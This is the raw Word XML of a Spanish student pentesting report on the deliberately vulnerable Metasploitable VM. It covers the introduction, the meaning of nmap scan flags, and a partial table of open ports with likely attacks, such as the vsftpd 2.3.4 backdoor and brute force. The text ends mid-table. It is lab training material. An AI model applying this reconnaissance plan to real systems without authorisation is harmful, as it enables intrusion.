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1458400"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="3F5E7BA9" w14:textId="77777777" w:rsidR="002575E8" w:rsidRDefault="002575E8"/>
        <w:p w14:paraId="26BAE06E" w14:textId="77777777" w:rsidR="002575E8" w:rsidRDefault="002575E8">
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="es-MX"/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wps">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="182880" distR="182880" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F045008">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CAA36" w14:textId="77777777" w:rsidR="002575E8" w:rsidRDefault="0000000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575E8">
                                      <w:rPr>
                                        <w:color w:val="5B9BD5" w:themeColor="accent1"/>
                                        <w:sz w:val="72"/>
                                        <w:szCs w:val="72"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">Pruebas de penetración a </w:t>
                                    </w:r>
                                    <w:proofErr w:type="spellStart"/>
                                    <w:r w:rsidR="002575E8">
                                      <w:rPr>
                                        <w:color w:val="5B9BD5" w:themeColor="accent1"/>
                                        <w:sz w:val="72"/>
                                        <w:szCs w:val="72"/>
                                      </w:rPr>
                                      <w:t>Metasploitable</w:t>
                                    </w:r>
                                    <w:proofErr w:type="spellEnd"/>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04AD95E" w14:textId="77777777" w:rsidR="002575E8" w:rsidRDefault="002575E8">
                                    <w:pPr>
                                      <w:pStyle w:val="Sinespaciado"/>
                                      <w:spacing w:before="40" w:after="40"/>
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
                                        <w:sz w:val="28"/>
                                        <w:szCs w:val="28"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r>
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
                                        <w:sz w:val="28"/>
                                        <w:szCs w:val="28"/>
                                      </w:rPr>
                                      <w:t>Modulo de pentesting</w:t>
                                    </w:r>
                                  </w:p>
                                </w:sdtContent>
                              </w:sdt>
                              <w:p w14:paraId="0281DFD1" w14:textId="77777777" w:rsidR="002575E8" w:rsidRDefault="002575E8">
                                <w:pPr>
                                  <w:pStyle w:val="Sinespaciado"/>
                                  <w:spacing w:before="80" w:after="40"/>
                                  <w:rPr>
                                    <w:caps/>
                                    <w:color w:val="4472C4" w:themeColor="accent5"/>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r>
                                  <w:rPr>
                                    <w:caps/>
                                    <w:color w:val="4472C4" w:themeColor="accent5"/>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t>Jose benito ibarria top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2575E8" w:rsidRDefault="0024737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75E8">
                                <w:rPr>
                                  <w:color w:val="5B9BD5" w:themeColor="accent1"/>
                                  <w:sz w:val="72"/>
                                  <w:szCs w:val="72"/>
                                </w:rPr>
                                <w:t>Pruebas de penetración a Metasploitable</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575E8" w:rsidRDefault="002575E8">
                              <w:pPr>
                                <w:pStyle w:val="Sinespaciado"/>
                                <w:spacing w:before="40" w:after="40"/>
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:t>Modulo de pentesting</w:t>
                              </w:r>
                            </w:p>
                          </w:sdtContent>
                        </w:sdt>
                        <w:p w:rsidR="002575E8" w:rsidRDefault="002575E8">
                          <w:pPr>
                            <w:pStyle w:val="Sinespaciado"/>
                            <w:spacing w:before="80" w:after="40"/>
                            <w:rPr>
                              <w:caps/>
                              <w:color w:val="4472C4" w:themeColor="accent5"/>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:caps/>
                              <w:color w:val="4472C4" w:themeColor="accent5"/>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t>Jose benito ibarria topete</w:t>
                          </w:r>
                        </w:p>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37F32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2-19T00:00:00Z">
                                    <w:dateFormat w:val="yyyy"/>
                                    <w:lid w:val="es-ES"/>
                                    <w:storeMappedDataAs w:val="dateTime"/>
                                    <w:calendar w:val="gregorian"/>
                                  </w:date>
                                </w:sdtPr>
                                <w:sdtContent>
                                  <w:p w14:paraId="3C64F540" w14:textId="77777777" w:rsidR="002575E8" w:rsidRDefault="002575E8">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2-19T00:00:00Z">
                              <w:dateFormat w:val="yyyy"/>
                              <w:lid w:val="es-ES"/>
                              <w:storeMappedDataAs w:val="dateTime"/>
                              <w:calendar w:val="gregorian"/>
                            </w:date>
                          </w:sdtPr>
                          <w:sdtEndPr/>
                          <w:sdtContent>
                            <w:p w:rsidR="002575E8" w:rsidRDefault="002575E8">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br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="6A40B439" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8" w:rsidP="003C74C8">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Índice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4EEDDC" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRPr="003C74C8" w:rsidRDefault="003C74C8" w:rsidP="003C74C8"/>
    <w:p w14:paraId="2207F421" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8">
      <w:r>
        <w:t xml:space="preserve">Análisis de vulnerabilidades infraestructura </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262D5C59" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8">
      <w:r>
        <w:t xml:space="preserve">Explotación Manual </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353C8B50" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8">
      <w:r>
        <w:t xml:space="preserve">Explotación automática </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB952C1" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8">
      <w:r>
        <w:t xml:space="preserve">Análisis de vulnerabilidades Web </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A89605" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8">
      <w:r>
        <w:t xml:space="preserve">Explotación Manual </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C902AD7" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8">
      <w:r>
        <w:t xml:space="preserve">Explotación automática </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C83898" w14:textId="77777777" w:rsidR="00A50144" w:rsidRDefault="003C74C8">
      <w:r>
        <w:t>Realización de informe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59300BCA" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8"/>
    <w:p w14:paraId="234125CB" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8"/>
    <w:p w14:paraId="15539552" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8"/>
    <w:p w14:paraId="42942396" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8"/>
    <w:p w14:paraId="4825FF31" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8"/>
    <w:p w14:paraId="74BBE280" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8"/>
    <w:p w14:paraId="66ED3153" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8"/>
    <w:p w14:paraId="348A1B7D" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8"/>
    <w:p w14:paraId="314D5830" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8"/>
    <w:p w14:paraId="7F3CF1BD" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8"/>
    <w:p w14:paraId="6012EABA" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8"/>
    <w:p w14:paraId="50C3C034" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8"/>
    <w:p w14:paraId="00B1748B" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8"/>
    <w:p w14:paraId="32D0B052" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8"/>
    <w:p w14:paraId="0B08F9A2" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8"/>
    <w:p w14:paraId="725D7189" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8" w:rsidP="003C74C8">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Introducción</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D98760" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8" w:rsidP="003C74C8">
      <w:r>
        <w:t xml:space="preserve">En el presente documento se describe una serie de vulnerabilidades descubiertas al software </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">así mismo se documenta la explotación a estas vulnerabilidades encontradas lo que en esencia representan la superficie de ataque al sistema descrito. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052B2DA5" w14:textId="77777777" w:rsidR="003C74C8" w:rsidRDefault="003C74C8" w:rsidP="003C74C8">
      <w:r>
        <w:t xml:space="preserve">El objetivo general es fundamentalmente descubrir y explotar las vulnerabilidades encontradas en la plataforma, mientras que los objetivos específicos se dirigen a, en primer lugar es adquirir un conocimiento solido del proceso de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a un sistema de software (tanto infraestructura como web), en segundo lugar evidenciar </w:t>
      </w:r>
      <w:r w:rsidR="00D64594">
        <w:t xml:space="preserve">y documentar </w:t>
      </w:r>
      <w:r>
        <w:t>todas y cada una de las vulnerabilidades encontradas</w:t>
      </w:r>
      <w:r w:rsidR="00D64594">
        <w:t xml:space="preserve"> y por último familiarizarse con todo el proceso de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D64594">
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D64594">
        <w:t xml:space="preserve"> a un sistema de software. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6482B628" w14:textId="77777777" w:rsidR="00D64594" w:rsidRDefault="00D64594" w:rsidP="003C74C8">
      <w:r>
        <w:t xml:space="preserve">Para lograr lo anterior necesitaremos en esencia 2 cosas, una máquina virtual con una plataforma que nos permita utilizar todas las herramientas de escaneo, análisis y explotación de vulnerabilidades como será </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Linux y la plataforma a analizar que en este caso es </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, bien pudiendo ser cualquier otro sistema o plataforma web lo que en esencia significa que, las herramientas y procedimientos aplicados al sistema a analizar podrían fácilmente extrapolarse a cualquier otro sistema informático.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0593049C" w14:textId="77777777" w:rsidR="00D64594" w:rsidRDefault="00D64594" w:rsidP="003C74C8"/>
    <w:p w14:paraId="7424939C" w14:textId="77777777" w:rsidR="00D64594" w:rsidRDefault="00D64594" w:rsidP="003C74C8"/>
    <w:p w14:paraId="3A3FB7B1" w14:textId="77777777" w:rsidR="00D64594" w:rsidRDefault="00D64594" w:rsidP="003C74C8"/>
    <w:p w14:paraId="3976CA0F" w14:textId="77777777" w:rsidR="00D64594" w:rsidRDefault="00D64594" w:rsidP="003C74C8"/>
    <w:p w14:paraId="1D32633D" w14:textId="77777777" w:rsidR="00D64594" w:rsidRDefault="00D64594" w:rsidP="003C74C8"/>
    <w:p w14:paraId="3115E112" w14:textId="77777777" w:rsidR="00D64594" w:rsidRDefault="00D64594" w:rsidP="003C74C8"/>
    <w:p w14:paraId="2F683513" w14:textId="77777777" w:rsidR="00D64594" w:rsidRDefault="00D64594" w:rsidP="003C74C8"/>
    <w:p w14:paraId="4BC8E2F5" w14:textId="77777777" w:rsidR="00D64594" w:rsidRDefault="00D64594" w:rsidP="003C74C8"/>
    <w:p w14:paraId="74B7AEA9" w14:textId="77777777" w:rsidR="00D64594" w:rsidRDefault="00D64594" w:rsidP="003C74C8"/>
    <w:p w14:paraId="45B48B8C" w14:textId="77777777" w:rsidR="00D64594" w:rsidRDefault="00D64594" w:rsidP="003C74C8"/>
    <w:p w14:paraId="3A5A40F8" w14:textId="77777777" w:rsidR="00D64594" w:rsidRDefault="00D64594" w:rsidP="003C74C8"/>
    <w:p w14:paraId="337B2C08" w14:textId="77777777" w:rsidR="00D64594" w:rsidRDefault="00D64594" w:rsidP="003C74C8"/>
    <w:p w14:paraId="175502C1" w14:textId="77777777" w:rsidR="00D64594" w:rsidRPr="003C74C8" w:rsidRDefault="00D64594" w:rsidP="00D64594"/>
    <w:p w14:paraId="33576368" w14:textId="77777777" w:rsidR="00D64594" w:rsidRDefault="00D64594" w:rsidP="00D64594">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Análisis de vulnerabilidades infraestructura </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8D5696" w14:textId="77777777" w:rsidR="00D64594" w:rsidRPr="003C74C8" w:rsidRDefault="00D64594" w:rsidP="00D64594">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="01C3176E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>8255</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5612130" cy="282638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anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3F8F1C" w14:textId="77777777" w:rsidR="00D64594" w:rsidRPr="00D64594" w:rsidRDefault="00D64594" w:rsidP="00D64594"/>
    <w:p w14:paraId="3061FE1D" w14:textId="77777777" w:rsidR="00D64594" w:rsidRDefault="00D64594" w:rsidP="003C74C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A5E6950" w14:textId="77777777" w:rsidR="00D64594" w:rsidRPr="00D64594" w:rsidRDefault="00D64594" w:rsidP="00D64594"/>
    <w:p w14:paraId="52FB068A" w14:textId="77777777" w:rsidR="00D64594" w:rsidRPr="00D64594" w:rsidRDefault="00D64594" w:rsidP="00D64594"/>
    <w:p w14:paraId="0336CC3B" w14:textId="77777777" w:rsidR="00D64594" w:rsidRPr="00D64594" w:rsidRDefault="00D64594" w:rsidP="00D64594"/>
    <w:p w14:paraId="68459CB8" w14:textId="77777777" w:rsidR="00D64594" w:rsidRPr="00D64594" w:rsidRDefault="00D64594" w:rsidP="00D64594"/>
    <w:p w14:paraId="519A1BE8" w14:textId="77777777" w:rsidR="00D64594" w:rsidRPr="00D64594" w:rsidRDefault="00D64594" w:rsidP="00D64594"/>
    <w:p w14:paraId="202D74B1" w14:textId="77777777" w:rsidR="00D64594" w:rsidRDefault="00D64594" w:rsidP="00D64594"/>
    <w:p w14:paraId="0AE262E0" w14:textId="77777777" w:rsidR="00D64594" w:rsidRDefault="00D64594" w:rsidP="00D64594">
      <w:r>
        <w:t>En el paso número 1 hemos lanzado la herramienta nmap a la dirección IP de la maquina a explorar, en este caso, el comando nmap va acompañado de los siguientes parámetros:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F7E42C" w14:textId="77777777" w:rsidR="00D64594" w:rsidRDefault="00D64594" w:rsidP="00D64594">
      <w:r>
        <w:t>-p-: Que básicamente ordena que se analicen todos los puertos conocidos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F939B0" w14:textId="77777777" w:rsidR="00D64594" w:rsidRDefault="00D64594" w:rsidP="00D64594">
      <w:r>
        <w:t>-A: Identifica todas las versiones</w:t>
      </w:r>
      <w:r w:rsidR="00E40B8C">
        <w:t xml:space="preserve"> y principalmente los servicios que corren en esos puertos (http, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E40B8C">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E40B8C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E40B8C">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E40B8C">
        <w:t xml:space="preserve">, ftp, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E40B8C">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E40B8C">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6526D646" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRDefault="00E40B8C" w:rsidP="00D64594">
      <w:r>
        <w:t>--open: Aplica un filtro en el cual solo se han de regresar los puertos que se encuentren abiertos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF72442" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRDefault="00E40B8C" w:rsidP="00E40B8C">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>Resumen de lo encontrado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D36AFE0" w14:textId="77777777" w:rsidR="00EC6EE1" w:rsidRPr="00EC6EE1" w:rsidRDefault="00EC6EE1" w:rsidP="00EC6EE1">
      <w:r>
        <w:t>La siguiente tabla muestra un resumen de los puertos abiertos encontrados y que, en esencia podríamos utilizar para realizar los ataques que se describen en la misma.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="89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940"/>
        <w:gridCol w:w="1147"/>
        <w:gridCol w:w="2277"/>
        <w:gridCol w:w="4577"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EC6EE1" w:rsidRPr="00EC6EE1" w14:paraId="0B4B4B07" w14:textId="77777777" w:rsidTr="00EC6EE1">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2605EB2F" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>Puerto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C1C3680" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>Servicio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7163B0D4" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>Versión</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1883972D" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>Probable Vulnerabilidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC6EE1" w:rsidRPr="00EC6EE1" w14:paraId="1F50C298" w14:textId="77777777" w:rsidTr="00EC6EE1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="628A0F6D" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>21/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="657EB82A" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="496C0EDB" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>vsftpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t xml:space="preserve"> 2.3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5182BB1A" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>Vulnerable a backdoor, ataques de fuerza bruta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC6EE1" w:rsidRPr="00EC6EE1" w14:paraId="3DE9BE3C" w14:textId="77777777" w:rsidTr="00EC6EE1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7845F524" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:lastRenderedPageBreak/>
              <w:t>22/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EDA6190" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ADD91FB" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>OpenSSH</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t xml:space="preserve"> 4.7p1 Debian 8ubuntu1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7135F44A" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t xml:space="preserve">Vulnerable a ataques de fuerza bruta, posibles </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>exploits</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t xml:space="preserve"> antiguos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC6EE1" w:rsidRPr="00EC6EE1" w14:paraId="7A7E21CF" w14:textId="77777777" w:rsidTr="00EC6EE1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B33C74F" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>23/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
